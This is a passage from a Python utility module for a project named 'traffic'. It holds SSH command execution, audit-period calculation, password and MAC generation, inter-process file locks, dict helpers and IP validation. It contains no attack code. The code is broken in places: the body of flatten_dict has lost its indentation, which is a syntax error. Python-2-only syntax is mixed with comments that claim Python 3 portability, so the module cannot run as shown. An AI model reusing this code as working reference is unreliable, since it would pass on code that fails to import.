        msg = _('process_input not supported over SSH')
        raise exception.TrafficException(msg)
    stdin_stream, stdout_stream, stderr_stream = ssh.exec_command(cmd)
    channel = stdout_stream.channel
    #stdin.write('process_input would go here')
    #stdin.flush()
    # NOTE(justinsb): This seems suspicious...
    # ...other SSH clients have buffering issues with this approach
    stdout = stdout_stream.read()
    stderr = stderr_stream.read()
    stdin_stream.close()
    exit_status = channel.recv_exit_status()
    # exit_status == -1 if no exit code was returned
    if exit_status != -1:
        LOG.debug(_('Result was %s') % exit_status)
        if check_exit_code and exit_status != 0:
            raise exception.ProcessExecutionError(exit_code=exit_status,
                                                  stdout=stdout,
                                                  stderr=stderr,
                                                  cmd=' '.join(cmd))
    return (stdout, stderr)
def trafficdir():
    """Return the directory that contains the `traffic` package."""
    import traffic
    init_path = os.path.abspath(traffic.__file__)
    return init_path.split('traffic/__init__.py')[0]
def debug(arg):
    """Log `arg` at debug level and return it unchanged.

    Handy for inserting into callback chains without altering them.
    """
    LOG.debug(_('debug in callback: %s'), arg)
    return arg
def generate_uid(topic, size=8):
    """Return a random id of the form '<topic>-<size random chars>'.

    :param topic: prefix placed before the dash
    :param size: number of random characters (digits + lowercase letters)
    """
    # BUG FIX: the previous alphabet '01234567890abc...' listed '0'
    # twice, biasing the character distribution toward zero.
    characters = '0123456789abcdefghijklmnopqrstuvwxyz'
    choices = [random.choice(characters) for _x in range(size)]
    return '%s-%s' % (topic, ''.join(choices))
# Symbol groups consumed by generate_password() below; each inner string
# is one "class" of characters, and at least one character from every
# class appears in a generated password.
# Default symbols to use for passwords. Avoids visually confusing characters.
# ~6 bits per symbol
DEFAULT_PASSWORD_SYMBOLS = ('23456789',  # Removed: 0,1
                            'ABCDEFGHJKLMNPQRSTUVWXYZ',  # Removed: I, O
                            'abcdefghijkmnopqrstuvwxyz')  # Removed: l
# ~5 bits per symbol
EASIER_PASSWORD_SYMBOLS = ('23456789',  # Removed: 0, 1
                           'ABCDEFGHJKLMNPQRSTUVWXYZ')  # Removed: I, O
def last_completed_audit_period(unit=None, before=None):
    """This method gives you the most recently *completed* audit period.

    arguments:
            units: string, one of 'hour', 'day', 'month', 'year'
                    Periods normally begin at the beginning (UTC) of the
                    period unit (So a 'day' period begins at midnight UTC,
                    a 'month' unit on the 1st, a 'year' on Jan, 1)
                    unit string may be appended with an optional offset
                    like so:  'day@18'  This will begin the period at 18:00
                    UTC.  'month@15' starts a monthly period on the 15th,
                    and year@3 begins a yearly one on March 1st.
            before: Give the audit period most recently completed before
                    <timestamp>. Defaults to now.

    returns:  2 tuple of datetimes (begin, end)
              The begin timestamp of this audit period is the same as the
              end of the previous.
    """
    if not unit:
        unit = FLAGS.instance_usage_audit_period
    offset = 0
    if '@' in unit:
        unit, offset = unit.split("@", 1)
        offset = int(offset)
    if before is not None:
        rightnow = before
    else:
        rightnow = timeutils.utcnow()
    if unit not in ('month', 'day', 'year', 'hour'):
        raise ValueError('Time period must be hour, day, month or year')
    if unit == 'month':
        # Offset 0 means "start periods on the 1st of the month".
        if offset == 0:
            offset = 1
        end = datetime.datetime(day=offset,
                                month=rightnow.month,
                                year=rightnow.year)
        if end >= rightnow:
            # This month's boundary hasn't passed yet; the most recently
            # completed period ends at last month's boundary (roll the
            # year back when stepping from January).
            year = rightnow.year
            if 1 >= rightnow.month:
                year -= 1
                month = 12 + (rightnow.month - 1)
            else:
                month = rightnow.month - 1
            end = datetime.datetime(day=offset,
                                    month=month,
                                    year=year)
        # begin is exactly one month before end, with year rollover.
        year = end.year
        if 1 >= end.month:
            year -= 1
            month = 12 + (end.month - 1)
        else:
            month = end.month - 1
        begin = datetime.datetime(day=offset, month=month, year=year)
    elif unit == 'year':
        # Offset 0 means "start periods on January 1st".
        if offset == 0:
            offset = 1
        end = datetime.datetime(day=1, month=offset, year=rightnow.year)
        if end >= rightnow:
            end = datetime.datetime(day=1,
                                    month=offset,
                                    year=rightnow.year - 1)
            begin = datetime.datetime(day=1,
                                      month=offset,
                                      year=rightnow.year - 2)
        else:
            begin = datetime.datetime(day=1,
                                      month=offset,
                                      year=rightnow.year - 1)
    elif unit == 'day':
        # Offset is the hour (UTC) at which daily periods begin.
        end = datetime.datetime(hour=offset,
                                day=rightnow.day,
                                month=rightnow.month,
                                year=rightnow.year)
        if end >= rightnow:
            end = end - datetime.timedelta(days=1)
        begin = end - datetime.timedelta(days=1)
    elif unit == 'hour':
        # Offset is the minute at which hourly periods begin.
        end = rightnow.replace(minute=offset, second=0, microsecond=0)
        if end >= rightnow:
            end = end - datetime.timedelta(hours=1)
        begin = end - datetime.timedelta(hours=1)
    return (begin, end)
def generate_password(length=20, symbolgroups=DEFAULT_PASSWORD_SYMBOLS):
    """Generate a random password from the supplied symbol groups.

    At least one symbol from each group will be included. Unpredictable
    results if length is less than the number of symbol groups.

    Believed to be reasonably secure (with a reasonable password length!)
    """
    rng = random.SystemRandom()
    # NOTE(jerdfelt): Some password policies require at least one character
    # from each group of symbols, so start off with one random character
    # from each symbol group
    chars = [rng.choice(group) for group in symbolgroups]
    # If length < len(symbolgroups), the leading characters will only
    # be from the first length groups. Try our best to not be predictable
    # by shuffling and then truncating.
    rng.shuffle(chars)
    chars = chars[:length]
    # Top up with characters drawn from the union of all the groups.
    all_symbols = ''.join(symbolgroups)
    chars.extend(rng.choice(all_symbols)
                 for _ in range(length - len(chars)))
    # finally shuffle to ensure first x characters aren't from a
    # predictable group
    rng.shuffle(chars)
    return ''.join(chars)
def last_octet(address):
    """Return the final dotted component of an IPv4 address as an int."""
    _head, _sep, tail = address.rpartition('.')
    return int(tail)
def get_my_linklocal(interface):
    """Return the IPv6 link-local address configured on `interface`.

    Shells out to `ip` and scrapes the first scope-link inet6 address.

    :raises exception.TrafficException: when the command fails or no
        link-local address is present.
    """
    try:
        if_str = execute('ip', '-f', 'inet6', '-o', 'addr', 'show', interface)
        # Raw string so the regex escapes are explicit and survive edits.
        condition = r'\s+inet6\s+([0-9a-f:]+)/\d+\s+scope\s+link'
        links = [re.search(condition, x) for x in if_str[0].split('\n')]
        address = [w.group(1) for w in links if w is not None]
        # BUG FIX: previously indexed address[0] before checking the
        # list was non-empty, raising IndexError instead of the intended
        # "not found" error (still converted below, but with a bad message).
        if address:
            return address[0]
        else:
            msg = _('Link Local address is not found.:%s') % if_str
            raise exception.TrafficException(msg)
    except Exception as ex:
        msg = _("Couldn't get Link Local IP of %(interface)s"
                " :%(ex)s") % locals()
        raise exception.TrafficException(msg)
def parse_mailmap(mailmap='.mailmap'):
    """Parse a git-style mailmap file into {alias: canonical_email}.

    Returns an empty mapping when the file does not exist. Comment
    lines (leading '#') and lines without a space are ignored; both
    addresses are lowercased.
    """
    mapping = {}
    if os.path.exists(mailmap):
        # BUG FIX: use a context manager so the file handle is closed
        # deterministically (the old code leaked the open file object).
        with open(mailmap, 'r') as fp:
            for line in fp:
                line = line.strip()
                if not line.startswith('#') and ' ' in line:
                    canonical_email, alias = line.split(' ')
                    mapping[alias.lower()] = canonical_email.lower()
    return mapping
def str_dict_replace(s, mapping):
    """Return `s` with every key of `mapping` replaced by its value."""
    # items() instead of the Python-2-only iteritems(); behavior is
    # identical and the helper becomes portable.
    for old, new in mapping.items():
        s = s.replace(old, new)
    return s
class LazyPluggable(object):
    """A pluggable backend loaded lazily based on some value."""
    def __init__(self, pivot, **backends):
        # pivot: name of the FLAG whose value selects the backend.
        # backends: mapping of flag value -> module name, or
        #           (module name, fromlist) tuple for __import__.
        self.__backends = backends
        self.__pivot = pivot
        self.__backend = None
    def __get_backend(self):
        # Import the selected backend on first use and cache it.
        if not self.__backend:
            backend_name = FLAGS[self.__pivot]
            if backend_name not in self.__backends:
                msg = _('Invalid backend: %s') % backend_name
                raise exception.TrafficException(msg)
            backend = self.__backends[backend_name]
            if isinstance(backend, tuple):
                name = backend[0]
                fromlist = backend[1]
            else:
                name = backend
                fromlist = backend
            self.__backend = __import__(name, None, None, fromlist)
            LOG.debug(_('backend %s'), self.__backend)
        return self.__backend
    def __getattr__(self, key):
        # Delegate attribute access to the lazily-imported backend.
        backend = self.__get_backend()
        return getattr(backend, key)
class LoopingCallDone(Exception):
    """Exception to break out and stop a LoopingCall.

    The poll-function passed to LoopingCall can raise this exception to
    break out of the loop normally. This is somewhat analogous to
    StopIteration.

    An optional return-value can be included as the argument to the exception;
    this return-value will be returned by LoopingCall.wait()
    """
    def __init__(self, retvalue=True):
        """:param retvalue: Value that LoopingCall.wait() should return."""
        # Stashed here and delivered to the waiter by LoopingCall.
        self.retvalue = retvalue
class LoopingCall(object):
    """Repeatedly invoke a callable on a greenthread at a fixed interval.

    The callable may stop the loop by raising LoopingCallDone; its
    retvalue is then delivered to wait().
    """
    def __init__(self, f=None, *args, **kw):
        self.args = args
        self.kw = kw
        self.f = f
        self._running = False
    def start(self, interval, initial_delay=None):
        """Spawn the loop; returns the Event that wait() blocks on.

        :param interval: seconds to sleep between calls
        :param initial_delay: optional seconds to sleep before first call
        """
        self._running = True
        done = event.Event()
        def _inner():
            if initial_delay:
                greenthread.sleep(initial_delay)
            try:
                while self._running:
                    self.f(*self.args, **self.kw)
                    if not self._running:
                        break
                    greenthread.sleep(interval)
            # NOTE(review): Python-2-only 'except X, e' syntax.
            except LoopingCallDone, e:
                self.stop()
                done.send(e.retvalue)
            except Exception:
                LOG.exception(_('in looping call'))
                done.send_exception(*sys.exc_info())
                return
            else:
                done.send(True)
        self.done = done
        greenthread.spawn(_inner)
        return self.done
    def stop(self):
        # Loop exits after the current iteration; no interrupt is sent.
        self._running = False
    def wait(self):
        # Blocks until the loop finishes; returns retvalue or re-raises.
        return self.done.wait()
def xhtml_escape(value):
    """Escapes a string so it is valid within XML or XHTML."""
    extra_entities = {'"': '&quot;', "'": '&apos;'}
    return saxutils.escape(value, extra_entities)
def utf8(value):
    """Try to turn a string into utf-8 if possible.

    Code is directly from the utf8 function in
    http://github.com/facebook/tornado/blob/master/tornado/escape.py

    NOTE: Python 2 only — relies on the `unicode` builtin and byte `str`.
    """
    if isinstance(value, unicode):
        return value.encode('utf-8')
    # Already a byte string; asserts rather than raising a typed error.
    assert isinstance(value, str)
    return value
class _InterProcessLock(object):
    """Lock implementation which allows multiple locks, working around
    issues like bugs.debian.org/cgi-bin/bugreport.cgi?bug=632857 and does
    not require any cleanup. Since the lock is always held on a file
    descriptor rather than outside of the process, the lock gets dropped
    automatically if the process crashes, even if __exit__ is not executed.

    There are no guarantees regarding usage by multiple green threads in a
    single process here. This lock works only between processes. Exclusive
    access between local threads should be achieved using the semaphores
    in the @synchronized decorator.

    Note these locks are released when the descriptor is closed, so it's not
    safe to close the file descriptor while another green thread holds the
    lock. Just opening and closing the lock file can break synchronisation,
    so lock files must be accessed only using this abstraction.
    """
    def __init__(self, name):
        # name is the path of the lock file; opened lazily in __enter__.
        self.lockfile = None
        self.fname = name
    def __enter__(self):
        self.lockfile = open(self.fname, 'w')
        while True:
            try:
                # Using non-blocking locks since green threads are not
                # patched to deal with blocking locking calls.
                # Also upon reading the MSDN docs for locking(), it seems
                # to have a laughable 10 attempts "blocking" mechanism.
                self.trylock()
                return self
            # NOTE(review): Python-2-only 'except X, e' syntax.
            except IOError, e:
                if e.errno in (errno.EACCES, errno.EAGAIN):
                    # external locks synchronise things like iptables
                    # updates - give it some time to prevent busy spinning
                    time.sleep(0.01)
                else:
                    raise
    def __exit__(self, exc_type, exc_val, exc_tb):
        try:
            self.unlock()
            self.lockfile.close()
        except IOError:
            # Best effort: log and swallow so the original exception
            # (if any) propagates instead.
            LOG.exception(_("Could not release the acquired lock `%s`")
                          % self.fname)
    def trylock(self):
        # Platform-specific subclasses implement the non-blocking acquire.
        raise NotImplementedError()
    def unlock(self):
        # Platform-specific subclasses implement the release.
        raise NotImplementedError()
class _WindowsLock(_InterProcessLock):
    """File lock backed by msvcrt.locking (Windows)."""
    def trylock(self):
        # LK_NBLCK: non-blocking exclusive lock on 1 byte.
        msvcrt.locking(self.lockfile, msvcrt.LK_NBLCK, 1)
    def unlock(self):
        msvcrt.locking(self.lockfile, msvcrt.LK_UNLCK, 1)
class _PosixLock(_InterProcessLock):
    """File lock backed by fcntl.lockf (POSIX)."""
    def trylock(self):
        # LOCK_NB: raise IOError (EACCES/EAGAIN) instead of blocking.
        fcntl.lockf(self.lockfile, fcntl.LOCK_EX | fcntl.LOCK_NB)
    def unlock(self):
        fcntl.lockf(self.lockfile, fcntl.LOCK_UN)
# Select the platform-appropriate lock class; msvcrt and fcntl are each
# importable only on their own platform, hence the conditional import.
if os.name == 'nt':
    import msvcrt
    InterProcessLock = _WindowsLock
else:
    import fcntl
    InterProcessLock = _PosixLock
# Cache of named semaphores used by @synchronized; weak values let a
# semaphore be garbage-collected once no decorator instance holds it.
_semaphores = weakref.WeakValueDictionary()
def synchronized(name, external=False, lock_path=None):
    """Synchronization decorator.

    Decorating a method like so::

        @synchronized('mylock')
        def foo(self, *args):
           ...

    ensures that only one thread will execute the bar method at a time.

    Different methods can share the same lock::

        @synchronized('mylock')
        def foo(self, *args):
           ...

        @synchronized('mylock')
        def bar(self, *args):
           ...

    This way only one of either foo or bar can be executing at a time.

    The external keyword argument denotes whether this lock should work across
    multiple processes. This means that if two different workers both run a
    a method decorated with @synchronized('mylock', external=True), only one
    of them will execute at a time.

    The lock_path keyword argument is used to specify a special location for
    external lock files to live. If nothing is set, then FLAGS.lock_path is
    used as a default.
    """
    def wrap(f):
        @functools.wraps(f)
        def inner(*args, **kwargs):
            # NOTE(soren): If we ever go natively threaded, this will be racy.
            #              See http://stackoverflow.com/questions/5390569/dyn
            #              amically-allocating-and-destroying-mutexes
            sem = _semaphores.get(name, semaphore.Semaphore())
            if name not in _semaphores:
                # this check is not racy - we're already holding ref locally
                # so GC won't remove the item and there was no IO switch
                # (only valid in greenthreads)
                _semaphores[name] = sem
            with sem:
                LOG.debug(_('Got semaphore "%(lock)s" for method '
                            '"%(method)s"...'), {'lock': name,
                                                 'method': f.__name__})
                if external and not FLAGS.disable_process_locking:
                    LOG.debug(_('Attempting to grab file lock "%(lock)s" for '
                                'method "%(method)s"...'),
                              {'lock': name, 'method': f.__name__})
                    cleanup_dir = False
                    # We need a copy of lock_path because it is non-local
                    local_lock_path = lock_path
                    if not local_lock_path:
                        local_lock_path = FLAGS.lock_path
                    if not local_lock_path:
                        # No configured location: fall back to a temp dir
                        # that is removed again after the call.
                        cleanup_dir = True
                        local_lock_path = tempfile.mkdtemp()
                    if not os.path.exists(local_lock_path):
                        cleanup_dir = True
                        ensure_tree(local_lock_path)
                    # NOTE(mikal): the lock name cannot contain directory
                    # separators
                    safe_name = name.replace(os.sep, '_')
                    lock_file_path = os.path.join(local_lock_path,
                                                  'traffic-%s' % safe_name)
                    try:
                        lock = InterProcessLock(lock_file_path)
                        with lock:
                            LOG.debug(_('Got file lock "%(lock)s" for '
                                        'method "%(method)s"...'),
                                      {'lock': name, 'method': f.__name__})
                            retval = f(*args, **kwargs)
                    finally:
                        # NOTE(vish): This removes the tempdir if we needed
                        #             to create one. This is used to cleanup
                        #             the locks left behind by unit tests.
                        if cleanup_dir:
                            shutil.rmtree(local_lock_path)
                else:
                    retval = f(*args, **kwargs)
            return retval
        return inner
    return wrap
def delete_if_exists(pathname):
    """Delete a file, silently ignoring "file not found" errors."""
    try:
        os.unlink(pathname)
    except OSError as err:
        # Re-raise anything other than a missing file.
        if err.errno != errno.ENOENT:
            raise
def get_from_path(items, path):
    """Returns a list of items matching the specified path.

    Takes an XPath-like expression e.g. prop1/prop2/prop3, and for each item
    in items, looks up items[prop1][prop2][prop3]. Like XPath, if any of the
    intermediate results are lists it will treat each list item individually.
    A 'None' in items or any child expressions will be ignored, this function
    will not throw because of None (anywhere) in items. The returned list
    will contain no None values.
    """
    if path is None:
        raise exception.TrafficException('Invalid mini_xpath')
    token, sep, remainder = path.partition('/')
    if token == '':
        raise exception.TrafficException('Invalid mini_xpath')
    if items is None:
        return []
    if not isinstance(items, list):
        # A bare object is treated as a one-element list.
        items = [items]
    matches = []
    for item in items:
        if item is None:
            continue
        getter = getattr(item, 'get', None)
        if getter is None:
            # Not mapping-like; nothing to look up.
            continue
        child = getter(token)
        if child is None:
            continue
        if isinstance(child, list):
            # Flatten one level of intermediate lists.
            matches.extend(child)
        else:
            matches.append(child)
    if sep:
        # More path tokens remain: descend into the collected children.
        return get_from_path(matches, remainder)
    return matches
def flatten_dict(dict_, flattened=None):
"""Recursively flatten a nested dictionary."""
flattened = flattened or {}
for key, value in dict_.iteritems():
if hasattr(value, 'iteritems'):
flatten_dict(value, flattened)
else:
flattened[key] = value
return flattened
def partition_dict(dict_, keys):
    """Return two dicts, one with `keys` the other with everything else."""
    intersection = {}
    difference = {}
    # items() instead of the Python-2-only iteritems(); behavior is
    # identical.
    for key, value in dict_.items():
        if key in keys:
            intersection[key] = value
        else:
            difference[key] = value
    return intersection, difference
def map_dict_keys(dict_, key_map):
    """Return a dict in which the dictionary's keys are mapped to new keys.

    Keys absent from `key_map` are carried over unchanged.
    """
    # items()/dict.get replace the Python-2-only iteritems() and the
    # manual membership test; behavior is identical.
    return dict((key_map.get(key, key), value)
                for key, value in dict_.items())
def subset_dict(dict_, keys):
    """Return a dict that only contains a subset of keys."""
    intersection, _rest = partition_dict(dict_, keys)
    return intersection
def diff_dict(orig, new):
    """
    Return a dict describing how to change orig to new.  The keys
    correspond to values that have changed; the value will be a list
    of one or two elements.  The first element of the list will be
    either '+' or '-', indicating whether the key was updated or
    deleted; if the key was updated, the list will contain a second
    element, giving the updated value.
    """
    changes = {}
    # Keys present in orig but absent from new were deleted.
    for key in set(orig) - set(new):
        changes[key] = ['-']
    # Keys that are new, or whose value differs, were added/updated.
    for key, value in new.items():
        if key not in orig or value != orig[key]:
            changes[key] = ['+', value]
    return changes
def check_isinstance(obj, cls):
    """Checks that obj is of type cls, and lets PyLint infer types."""
    if not isinstance(obj, cls):
        raise Exception(_('Expected object of type: %s') % (str(cls)))
    return obj
def parse_server_string(server_str):
    """
    Parses the given server_string and returns a list of host and port.
    If it's not a combination of host part and port, the port element
    is a null string. If the input is invalid expression, return a null
    list.
    """
    try:
        # First of all, exclude pure IPv6 address (w/o port).
        if netaddr.valid_ipv6(server_str):
            return (server_str, '')
        # Next, check if this is IPv6 address with a port number combination.
        if server_str.find("]:") != -1:
            (address, port) = server_str.replace('[', '', 1).split(']:')
            return (address, port)
        # Third, check if this is a combination of an address and a port
        if server_str.find(':') == -1:
            return (server_str, '')
        # This must be a combination of an address and a port
        # (note: splits on every ':', so this raises for malformed input
        # with multiple colons and falls through to the error path below)
        (address, port) = server_str.split(':')
        return (address, port)
    except Exception:
        LOG.error(_('Invalid server_string: %s'), server_str)
        return ('', '')
def gen_uuid():
    """Return a new random (version 4) UUID object."""
    return uuid.uuid4()
def is_uuid_like(val):
    """For our purposes, a UUID is a string in canonical form:

        aaaaaaaa-aaaa-aaaa-aaaa-aaaaaaaaaaaa
    """
    try:
        uuid.UUID(val)
    except (TypeError, ValueError, AttributeError):
        # Not parseable as a UUID (wrong type or malformed string).
        return False
    return True
def bool_from_str(val):
    """Convert a string representation of a bool into a bool value"""
    if not val:
        return False
    try:
        # Numeric strings: nonzero means True.
        return bool(int(val))
    except ValueError:
        # Otherwise accept the usual affirmative words.
        return val.lower() in ('true', 'yes', 'y')
def is_valid_boolstr(val):
    """Check if the provided string is a valid bool string or not. """
    accepted = ('true', 'false', 'yes', 'no', 'y', 'n', '1', '0')
    return str(val).lower() in accepted
def is_valid_ipv4(address):
    """valid the address strictly as per format xxx.xxx.xxx.xxx.

    where xxx is a value between 0 and 255.
    """
    octets = address.split(".")
    if len(octets) != 4:
        return False
    try:
        # Every component must parse as an int in [0, 255].
        return all(0 <= int(octet) <= 255 for octet in octets)
    except ValueError:
        return False
def is_valid_cidr(address):
    """Check if the provided ipv4 or ipv6 address is a valid
    CIDR address or not"""
    try:
        # Validate the correct CIDR Address
        netaddr.IPNetwork(address)
    except netaddr.core.AddrFormatError:
        return False
    except UnboundLocalError:
        # NOTE(MotoKen): work around bug in netaddr 0.7.5 (see detail in
        # https://github.com/drkjam/netaddr/issues/2)
        return False
    # Prior validation partially verify /xx part
    # Verify it here
    ip_segment = address.split('/')
    # A bare address (no '/') or an empty prefix length is not CIDR.
    if (len(ip_segment) <= 1 or
        ip_segment[1] == ''):
        return False
    return True
def monkey_patch():
    """ If the Flags.monkey_patch set as True,
    this function patches a decorator
    for all functions in specified modules.
    You can set decorators for each modules
    using FLAGS.monkey_patch_modules.
    The format is "Module path:Decorator function".
    Example: 'traffic.api.ec2.cloud:traffic.notifier.api.notify_decorator'

    Parameters of the decorator is as follows.
    (See traffic.notifier.api.notify_decorator)

    name - name of the function
    function - object of the function
    """
    # If FLAGS.monkey_patch is not True, this function do nothing.
    if not FLAGS.monkey_patch:
        return
    # Get list of modules and decorators
    for module_and_decorator in FLAGS.monkey_patch_modules:
        module, decorator_name = module_and_decorator.split(':')
        # import decorator function
        decorator = importutils.import_class(decorator_name)
        __import__(module)
        # Retrieve module information using pyclbr
        module_data = pyclbr.readmodule_ex(module)
        for key in module_data.keys():
            # set the decorator for the class methods
            if isinstance(module_data[key], pyclbr.Class):
                clz = importutils.import_class("%s.%s" % (module, key))
                for method, func in inspect.getmembers(clz, inspect.ismethod):
                    setattr(clz, method,
                            decorator("%s.%s.%s" % (module, key, method), func))
            # set the decorator for the function
            if isinstance(module_data[key], pyclbr.Function):
                func = importutils.import_class("%s.%s" % (module, key))
                setattr(sys.modules[module], key,
                        decorator("%s.%s" % (module, key), func))
def convert_to_list_dict(lst, label):
    """Wrap a value (or each element of a list) in a single-key dict.

    Returns None for falsy input; a non-list value is treated as a
    one-element list.
    """
    if not lst:
        return None
    items = lst if isinstance(lst, list) else [lst]
    return [{label: item} for item in items]
def timefunc(func):
    """Decorator that logs the wall-clock duration of each call."""
    @functools.wraps(func)
    def inner(*args, **kwargs):
        started = time.time()
        try:
            return func(*args, **kwargs)
        finally:
            # Log even when the wrapped call raises.
            elapsed = time.time() - started
            LOG.debug(_("timefunc: '%(name)s' took %(total_time).2f secs") %
                      dict(name=func.__name__, total_time=elapsed))
    return inner
def generate_glance_url():
    """Return the base URL for the glance service."""
    # TODO(jk0): This will eventually need to take SSL into consideration
    # when supported in glance.
    host = FLAGS.glance_host
    port = FLAGS.glance_port
    return "http://%s:%d" % (host, port)
def generate_image_url(image_ref):
    """Return the glance URL for the given image reference."""
    base = generate_glance_url()
    return "%s/images/%s" % (base, image_ref)
@contextlib.contextmanager
def remove_path_on_error(path):
    """Protect code that wants to operate on PATH atomically.
    Any exception will cause PATH to be removed.
    """
    try:
        yield
    except Exception:
        # Delete the (possibly partial) path, then re-raise the original
        # exception with its traceback intact.
        with excutils.save_and_reraise_exception():
            delete_if_exists(path)
def make_dev_path(dev, partition=None, base='/dev'):
    """Return a path to a particular device.

    >>> make_dev_path('xvdc')
    /dev/xvdc

    >>> make_dev_path('xvdc', 1)
    /dev/xvdc1
    """
    # A falsy partition (None or 0) yields the bare device path.
    suffix = str(partition) if partition else ''
    return os.path.join(base, dev) + suffix
def total_seconds(td):
    """Return the duration of timedelta `td` in seconds as a float.

    Falls back to manual arithmetic on Python < 2.7, where
    timedelta.total_seconds() does not exist.
    """
    try:
        return td.total_seconds()
    except AttributeError:
        micros = (td.days * 86400 + td.seconds) * 10 ** 6 + td.microseconds
        # Float division so sub-second precision is kept.
        return micros / 10.0 ** 6
def sanitize_hostname(hostname):
    """Return a hostname which conforms to RFC-952 and RFC-1123 specs.

    Spaces and underscores become hyphens, any character outside
    [A-Za-z0-9.-] is dropped, and the result is lowercased and stripped
    of leading/trailing dots and hyphens.
    """
    if isinstance(hostname, unicode):
        # RFC-952 hostnames are ASCII; drop anything latin-1 cannot hold.
        hostname = hostname.encode('latin-1', 'ignore')

    hostname = re.sub(r'[ _]', '-', hostname)
    # Raw string so \w is interpreted by the regex engine rather than as
    # a (deprecated/invalid) string escape sequence.
    hostname = re.sub(r'[^\w.-]+', '', hostname)
    hostname = hostname.lower()
    hostname = hostname.strip('.-')

    return hostname
def read_cached_file(filename, cache_info, reload_func=None):
    """Read from a file, skipping the read when it has not been modified.

    :param filename: path of the file to read
    :param cache_info: dictionary to hold opaque cache (stores 'mtime'
                       and 'data' keys between calls)
    :param reload_func: optional function to be called with data when
                        file is reloaded due to a modification.

    :returns: data from file
    """
    mtime = os.path.getmtime(filename)
    # Reload when there is no cached copy or the file changed on disk.
    if not cache_info or mtime != cache_info.get('mtime'):
        LOG.debug(_("Reloading cached file %s") % filename)
        with open(filename) as fap:
            cache_info['data'] = fap.read()
        cache_info['mtime'] = mtime
        if reload_func:
            reload_func(cache_info['data'])
    return cache_info['data']
def file_open(*args, **kwargs):
    """Open file, wrapping the built-in open().

    See built-in open()/file() documentation for more details.

    Note: The reason this is kept in a separate module is to easily
          be able to provide a stub module that doesn't alter system
          state at all (for unit tests)
    """
    # open() exists on both Python 2 and 3 with the same semantics here;
    # the file() builtin is Python-2-only.
    return open(*args, **kwargs)
def file_exist(pathname):
    """Return True if `pathname` names an existing regular file."""
    return os.path.isfile(pathname)
def hash_file(file_like_object):
    """Return the SHA-1 hex digest of a file-like object's contents.

    The object is read in 32 KiB chunks so arbitrarily large files can
    be hashed without loading them into memory.
    """
    digest = hashlib.sha1()
    chunk = file_like_object.read(32768)
    while chunk != b'':
        digest.update(chunk)
        chunk = file_like_object.read(32768)
    return digest.hexdigest()
@contextlib.contextmanager
def temporary_mutation(obj, **kwargs):
    """Temporarily set the attr on a particular object to a given value then
    revert when finished.

    One use of this is to temporarily set the read_deleted flag on a context
    object:

        with temporary_mutation(context, read_deleted="yes"):
            do_something_that_needed_deleted_objects()

    Attributes that did not exist beforehand are removed again on exit.
    """
    # Sentinel distinguishing "attribute was absent" from "attribute was
    # None" so absent attributes can be deleted on restore.
    NOT_PRESENT = object()

    old_values = {}
    for attr, new_value in kwargs.items():
        old_values[attr] = getattr(obj, attr, NOT_PRESENT)
        setattr(obj, attr, new_value)

    try:
        yield
    finally:
        for attr, old_value in old_values.items():
            if old_value is NOT_PRESENT:
                # Bug fix: this used to be `del obj[attr]`, which performs
                # *item* deletion and fails on plain attribute objects;
                # delattr matches the getattr/setattr protocol used above.
                delattr(obj, attr)
            else:
                setattr(obj, attr, old_value)
def service_is_up(service):
    """Check whether a service is up based on last heartbeat.

    :param service: mapping with 'updated_at'/'created_at' datetime values
    :returns: True if the last heartbeat is within FLAGS.service_down_time
    """
    last_heartbeat = service['updated_at'] or service['created_at']
    # Timestamps in DB are UTC.
    elapsed = total_seconds(timeutils.utcnow() - last_heartbeat)
    # abs() guards against clock skew producing a negative elapsed value.
    return abs(elapsed) <= FLAGS.service_down_time
def generate_mac_address():
    """Generate an Ethernet MAC address.

    The OUI prefix is fixed at fa:16:3e; the remaining three octets are
    random (the fourth octet limited to 0x00-0x7f).
    """
    # NOTE(vish): We would prefer to use 0xfe here to ensure that linux
    #             bridge mac addresses don't change, but it appears to
    #             conflict with libvirt, so we use the next highest octet
    #             that has the unicast and locally administered bits set
    #             properly: 0xfa.
    #             Discussion: https://bugs.launchpad.net/traffic/+bug/921838
    octets = [0xfa, 0x16, 0x3e,
              random.randint(0x00, 0x7f),
              random.randint(0x00, 0xff),
              random.randint(0x00, 0xff)]
    return ':'.join("%02x" % octet for octet in octets)
def read_file_as_root(file_path):
    """Secure helper to read file as root.

    :param file_path: path of the file to read via sudo'd `cat`
    :returns: the file contents as returned by execute()
    :raises: exception.FileNotFound when the cat command fails
    """
    try:
        out, _err = execute('cat', file_path, run_as_root=True)
        return out
    except exception.ProcessExecutionError:
        raise exception.FileNotFound(file_path=file_path)
@contextlib.contextmanager
def temporary_chown(path, owner_uid=None):
    """Temporarily chown a path.

    :params owner_uid: UID of temporary owner (defaults to current user)
    """
    if owner_uid is None:
        owner_uid = os.getuid()

    orig_uid = os.stat(path).st_uid

    # Only chown (via sudo) when the ownership actually differs.
    if orig_uid != owner_uid:
        execute('chown', owner_uid, path, run_as_root=True)
    try:
        yield
    finally:
        # Restore the original owner even if the guarded block raised.
        if orig_uid != owner_uid:
            execute('chown', orig_uid, path, run_as_root=True)
@contextlib.contextmanager
def tempdir(**kwargs):
    """Context manager yielding a temporary directory, removed on exit.

    Keyword arguments are passed through to tempfile.mkdtemp().
    Failure to remove the directory is logged rather than raised.
    """
    tmpdir = tempfile.mkdtemp(**kwargs)
    try:
        yield tmpdir
    finally:
        try:
            shutil.rmtree(tmpdir)
        except OSError as e:
            # `except OSError, e` was Python-2-only syntax; the `as` form
            # works on Python 2.6+ and 3.x alike.
            LOG.error(_('Could not remove tmpdir: %s'), str(e))
def strcmp_const_time(s1, s2):
    """Constant-time string comparison.

    :params s1: the first string
    :params s2: the second string

    :return: True if the strings are equal.

    Intended for authentication comparisons, so that the time taken does
    not leak how much of the strings matched (timing attacks).
    """
    if len(s1) != len(s2):
        return False
    diff = 0
    # Accumulate differences bitwise instead of returning early.
    for a, b in zip(s1, s2):
        diff |= ord(a) ^ ord(b)
    return diff == 0
def walk_class_hierarchy(clazz, encountered=None):
    """Walk class hierarchy, yielding most derived classes first"""
    if not encountered:
        encountered = []
    for subclass in clazz.__subclasses__():
        if subclass in encountered:
            continue
        encountered.append(subclass)
        # Recurse before yielding so the leaves come out first.
        for descendant in walk_class_hierarchy(subclass, encountered):
            yield descendant
        yield subclass
class UndoManager(object):
    """Provides a mechanism to facilitate rolling back a series of actions
    when an exception is raised.
    """
    def __init__(self):
        # Undo callables run in reverse (LIFO) registration order.
        self.undo_stack = []

    def undo_with(self, undo_func):
        """Register a zero-argument callable to run on rollback."""
        self.undo_stack.append(undo_func)

    def _rollback(self):
        # Undo in reverse registration order.
